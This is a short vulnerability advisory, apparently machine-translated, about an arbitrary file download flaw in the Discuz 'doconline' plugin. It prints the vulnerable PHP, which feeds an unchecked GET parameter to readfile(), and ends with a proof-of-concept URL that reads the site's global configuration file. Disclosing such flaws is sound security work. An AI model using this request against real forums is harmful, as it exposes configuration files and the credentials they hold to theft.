Discuz a plug-in to any local download vulnerability-vulnerability warning-the black bar safety net

2013-12-22T00:00:00
ID MYHACK58:62201341524
Type myhack58
Reporter 佚名
Modified 2013-12-22T00:00:00

Description

Author:y0umer

Plug-in download address:

http://www.discuz.net/forum.php?mod=viewthread&tid=3 1 6 9 5 5 6

Then look at the code:

$doc=$_GET['doc'];

$doc="../../../".$ doc;

$filename=$_GET['filename'];

$ext=$_GET['ext'];

//Set the file type

if($ext=='doc') {$_ext="application/msword";}

if($ext=='xls') {$_ext="application/vnd. ms-excel";}

if($ext=='ppt') {$_ext="application/vnd. ms-powerpoint";}

if($ext=='docx') {$_ext="application/vnd. openxmlformats-officedocument. wordprocessingml. template";}

if($ext=='xlsx') {$_ext="application/vnd. openxmlformats-officedocument. spreadsheetml. sheet";}

if($ext=='pptx') {$_ext="application/vnd. openxmlformats-officedocument. presentationml. presentation";}

if($ext=='pdf') {$_ext="application/pdf";}

if($ext=='txt') {$_ext="application/plain";}

//Set file header

header('Content-Disposition: attachment; filename='.$ filename);

header('Content-Type:'.$ _ext);

header('Content-Length:'. filesize($doc));

//Read the file

readfile($doc);

?& gt;

$doc didn't go through any processing on the readfile.

http://xxx.com/source/plugin/doconline/doconline.php?doc=/config/config_global_default.php